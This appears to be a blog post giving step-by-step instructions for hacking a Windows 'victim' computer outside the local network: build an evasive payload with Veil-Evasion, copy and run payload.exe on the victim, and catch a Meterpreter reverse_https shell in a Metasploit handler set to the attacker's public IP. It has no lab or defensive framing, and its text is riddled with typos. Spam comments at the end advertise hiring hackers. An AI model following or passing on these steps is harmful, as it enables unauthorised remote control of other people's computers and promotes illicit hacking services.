Hack Windows Veil-Evasion Use Public IP
Public ip is where we can penetration testing Outside Network. using a veil-evasion and metasploit, the lock on the penetration testing outside Network is the port fordwarding. because of port forwarding is a media liaison between victim and hackers. we could open fordwarding open port on our router, but it all depends on our isp.
- Open Veil-Evasion.
- Open terminal and type #./Veil-Evasion.py.
- Let system copiling your payload.
- After compiling finished, you can copy payload.exe to the computer victim and running it.
- Open new terminal and type #msfconsole
- After metasploit opened you can type "use exploit/multi/handler"
- Set payload paload windows/meterpeter/reverse_https
- show options
- Set LHOST 114.##.###.### <= your ip public
- Set LPORT 4449
- Set ReverselistenerBinAddress 10.10.40.5 <=your local ip
- exploit
- Run payload to the computer victim
- If payload.exe already running in victim computer then meterpreter sessions will be open in your kali linux
- type help for see all database meterpreter sessions.
- type sysinfo for look system info victim computer
- And finish. you success hacking computer victim in outside network.
If you are looking for more information about flat rate locksmith Las Vegas check that right away. hire a computer hacker
ReplyDeleteGreat post but I was wondering if you could write a little more on this subject? I’d be very thankful if you could elaborate a little bit further. Thanks in advance! Hire a professional phone hacker
ReplyDelete